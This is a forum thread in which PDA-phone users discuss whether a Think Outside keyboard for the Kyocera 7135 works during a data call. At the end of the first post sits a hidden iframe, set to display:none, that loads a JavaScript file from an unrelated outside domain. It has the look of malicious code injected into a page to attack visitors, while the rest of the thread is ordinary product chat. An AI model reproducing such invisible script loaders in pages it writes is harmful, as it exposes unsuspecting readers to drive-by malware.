+ Reply to Thread

7135 Keyboard Works During Data Call!

FYI:

According to a Kyo's customer support, the Think Outside keyboard for the 7135 will work while the unit is connected to the Internet (data call). This is a big change from the 6035, as the 6035 could not communicate to the serial port (connector on the bottom of the phone) during a data call.

Only $90 from http://www.thinkoutside.com/products/kyocera-oview.html (probably much less once they hit ebay). I'll gladly post reports/pics/reviews once all my new geek gear arrives in time for this weekend (hopefully).

Have a great New Years everyone!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

It will be interesting to see how well it works. I got rid of my keyboard for my 6035 because I didn't like lugging the keyboard plus the adapter around.

Not to mention it was near impossible to use it on a plane.

Post your experience when you have an opportunity to test it all out. Pictures would be even better.

Thanks

pdageek

Re: 7135 Keyboard Works During Data Call!

Originally posted by MikeW
    FYI:

According to a Kyo's customer support, the Think Outside keyboard for the 7135 will work while the unit is connected to the Internet (data call). This is a big change from the 6035, as the 6035 could not communicate to the serial port (connector on the bottom of the phone) during a data call.

Only $90 from http://www.thinkoutside.com/products/kyocera-oview.html (probably much less once they hit ebay). I'll gladly post reports/pics/reviews once all my new geek gear arrives in time for this weekend (hopefully).

Have a great New Years everyone!
    This is old news, but probably a good reminder for some new folks here. Welcome to the forum MikeW.
    ~'kito
    pdaPhoneHome Moderator

Re: Re: 7135 Keyboard Works During Data Call!

Originally posted by Markito
    This is old news, but probably a good reminder for some new folks here. Welcome to the forum MikeW.
    My initial search of the forums didn't turn up any info on the 7135 keyboard, but I found the thread after I posted the above info. I've admined other online forums and have done plenty of ranting at newbs that don't know how to use the search or read FAQ's

Anyway, I'm really excited because the formfactor of the 6035 and inability to use the keyboard while online were my two major hangups with the 6035... Do you know how hard it is to IRC on the Palm using graffiti?

Administrator
    yep, old info... but glad your excited about it!